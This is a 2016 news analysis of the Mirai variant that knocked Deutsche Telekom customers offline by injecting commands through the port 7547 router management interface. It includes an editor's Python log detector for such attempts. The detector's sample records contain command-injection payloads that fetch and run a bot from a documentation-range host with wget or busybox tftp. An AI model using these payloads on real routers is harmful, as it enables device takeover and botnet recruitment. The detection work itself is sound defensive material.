
1 December 2016

Deutsche Telekom operator meltdown as Mirai botnet attacks

Open-source is a wonderful thing, but perhaps not when it comes to malware – at least for Deutsche Telekom, which has come under fire from an adapted form of Mirai that went hunting for its consumer broadband WiFi routers. It’s the first sign of a looming debacle for CPE providers, and one that could seriously harm operator reputations.

Now, hopefully, Deutsche Telekom (DT) has the ability to remotely push software and firmware updates to the devices, to help mitigate against this attack in future. The irony is that port 7547, the one this variant abuses, is the TR-069 (CWMP) port that operators use for exactly that kind of remote management; the channel meant for pushing fixes was left listening to the whole internet. The lack of an OTA update option was one of the main reasons why Mirai took off in the IoT, as it was hijacking devices with poor default credentials that were often hard-coded into the firmware. Mirai itself lives only in memory, so a reboot clears it, but a device whose credentials cannot be changed is typically re-infected within minutes – meaning that in practice it can’t be kept off the device.

The scale of the attack, some 900,000 DT customers knocked offline according to Germany’s BSI, should worry every operator that has ever placed a connected device inside a consumer home. DT’s own account is that most of those routers hung while trying to process the attack traffic rather than being successfully recruited, which is the lucky version of this story. Lawsuits are almost certainly going to begin cropping up if businesses think they can prove damages caused by insecure field equipment, but a more pressing concern might be that of tarnished reputation. Think of Samsung’s gloomy smartphone future in the wake of its Note 7 inferno fiasco.

The new version of Mirai, according to the SANS Internet Storm Center, no longer relies only on spamming the box with combinations of default login credentials. It sends a crafted SOAP request to TCP port 7547, the port the TR-069 remote-management protocol uses, and on which the affected routers also expose the TR-064 configuration interface to the WAN. SOAP itself is just the message format; the vulnerability is that the router passes a parameter from that request (the NTP server address) to a shell without sanitising it, so the attacker’s value becomes a command that downloads and runs the bot. No password is involved at any point. Once installed, the bot closes port 7547 with a firewall rule so that other malware can’t use the same hole to get in.
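As an added illustration of how an operator or CPE vendor would spot this wave in its own telemetry (this is the editor’s example, not code from the article, DT or SANS), the script below runs over a handful of constructed request records in an assumed one-line-per-request layout and flags SOAP bodies on port 7547 that carry shell syntax instead of a plain parameter value. The NTP-server parameter name follows the public write-ups of the flaw; the addresses are documentation ranges, and the indicator patterns and the “distinct routers hit” scanner threshold are choices made for this example.

```python
"""Flag Mirai-style exploitation attempts against the TR-069/TR-064 port.

Added example (editor's illustration, not code from the article, DT or SANS).
Input format is assumed for this example: one request per line,
"<ts> <src_ip> <dst_ip> <dst_port> <method> <uri> <body>".
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set

CWMP_PORT = 7547  # TR-069 management port this Mirai variant scans for

# Indicators (editor's choice): command substitution never belongs in a SOAP
# parameter value, and a shell separator next to a fetch-and-run verb is the
# classic "download the bot and execute it" shape.
_SUBSTITUTION = re.compile(r"`|\$\(")
_SEPARATOR = re.compile(r"[;|&]")
_FETCH_EXEC = re.compile(r"\b(wget|tftp|curl|busybox|chmod|sh)\b")

# Assumed log layout: fields up to the URI carry no spaces, the body is the rest.
_LINE = re.compile(r"^(\S+) (\S+) (\S+) (\d+) (\S+) (\S+) ?(.*)$")


@dataclass
class Request:
    ts: str
    src: str
    dst: str
    dport: int
    method: str
    uri: str
    body: str


def parse_line(line: str) -> Optional[Request]:
    """Parse one record; return None for lines that do not fit the layout."""
    m = _LINE.match(line.strip())
    if not m:
        return None
    ts, src, dst, dport, method, uri, body = m.groups()
    return Request(ts, src, dst, int(dport), method, uri, body)


def is_command_injection(body: str) -> bool:
    """True when the SOAP body carries shell syntax instead of a plain value."""
    if _SUBSTITUTION.search(body):
        return True
    return bool(_SEPARATOR.search(body) and _FETCH_EXEC.search(body))


def analyze(log_text: str, scanner_threshold: int = 3) -> Dict[str, object]:
    """Return injection attempts on port 7547 and the sources spraying them.

    A source that hits scanner_threshold or more distinct routers with an
    injection payload is reported as a scanner.
    """
    attempts: List[Request] = []
    targets: Dict[str, Set[str]] = defaultdict(set)
    for line in log_text.splitlines():
        req = parse_line(line)
        # Scope is deliberately the CWMP port: that is what this variant hunts.
        if req is None or req.dport != CWMP_PORT or req.method != "POST":
            continue
        if is_command_injection(req.body):
            attempts.append(req)
            targets[req.src].add(req.dst)
    scanners = sorted(s for s, t in targets.items() if len(t) >= scanner_threshold)
    return {"attempts": attempts, "targets": dict(targets), "scanners": scanners}


# Constructed sample records (documentation addresses, not real traffic).
# The NTP-server parameter name mirrors the public write-ups of this flaw.
SAMPLE_LOG = """\
2016-11-28T09:00:01Z 203.0.113.5 100.64.0.11 7547 POST /soap <NewNTPServer1>`cd /tmp;wget http://198.51.100.7/1;chmod 777 1;./1`</NewNTPServer1>
2016-11-28T09:00:02Z 203.0.113.5 100.64.0.12 7547 POST /soap <NewNTPServer1>`cd /tmp;wget http://198.51.100.7/2;chmod 777 2;./2`</NewNTPServer1>
2016-11-28T09:00:03Z 203.0.113.5 100.64.0.13 7547 POST /soap <NewNTPServer1>`cd /tmp;wget http://198.51.100.7/3;chmod 777 3;./3`</NewNTPServer1>
2016-11-28T09:00:04Z 198.51.100.20 100.64.0.11 7547 POST /soap <NewNTPServer1>192.0.2.1;busybox tftp -g -r x 198.51.100.7;chmod +x x</NewNTPServer1>
2016-11-28T09:00:05Z 192.0.2.9 100.64.0.11 7547 POST /soap <NewNTPServer1>0.pool.ntp.org;1.pool.ntp.org</NewNTPServer1>
2016-11-28T09:00:06Z 192.0.2.9 100.64.0.11 7547 GET /soap
2016-11-28T09:00:07Z 203.0.113.77 100.64.0.11 80 POST /login user=admin;wget http://198.51.100.7/4
this line is not a request record
"""

if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    print(f"{len(result['attempts'])} injection attempts on tcp/{CWMP_PORT}")
    for src in result["scanners"]:
        print(f"scanner: {src} -> {len(result['targets'][src])} routers")
```

The benign record with two semicolon-separated NTP hosts is not flagged because it carries no fetch-or-execute verb, while the backtick payloads are flagged on the command substitution alone; the port-80 record is ignored on purpose, since the point here is the CWMP port. The second signal the article mentions, the bot closing port 7547 after infection, needs an active probe of each router rather than request logs, so it is not covered by this script.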

As for responses, DT has issued patches for its SpeedPort W 921V and SpeedPort W 723V Type B routers, and is offering a day-pass for mobile internet to customers while their routers are updated. If it’s a quick and easy fix, then DT shouldn’t have too much to worry about in terms of churn – but imagine the PR ramifications if an outage like this one, or one of the DDoS attacks the botnet is built to deliver, can be linked to a death caused by the loss of connectivity. In an increasingly hyper-connected world, the possibility of such a thing happening only grows with time.

Elsewhere, Xiphos Research’s Darren Martyn has told The Register that CPE from Eircom (Ireland) and TalkTalk (UK) are vulnerable to a proof-of-concept attack that allows remote takeovers via port 7547 on their ZyXEL routers. Martyn believes that devices from T-Com (DT’s former fixed-line brand, under which SpeedPort routers were sold), Aztech, Digicom, and MitraStar are also at risk. That’s not good news for operators, and should hopefully be causing some headaches behind the scenes as they try to work out a solution to this particular problem.

In theory, it should be a simple fix – a small firmware patch that stops exposing the port 7547 management interface to the WAN, and, against the original Mirai vector, getting the customer to change the login credentials from what is almost certainly the same password that was shipped in the box. Note that the password change does nothing against the port 7547 flaw, which needs no password at all; only the patch closes that one. For those without the infrastructure to swiftly issue such a patch, well, things might get a little grim.

But if the industry learns a painful lesson, Mirai could be a useful tool for change – forcing suppliers and providers to get their house in order. With the malware becoming increasingly complex, now with two MIPS builds and an ARM build, locking down home gateways with adequate (preferably outstanding) security would go a long way to securing the wider IoT, as homes are going to become increasingly connected.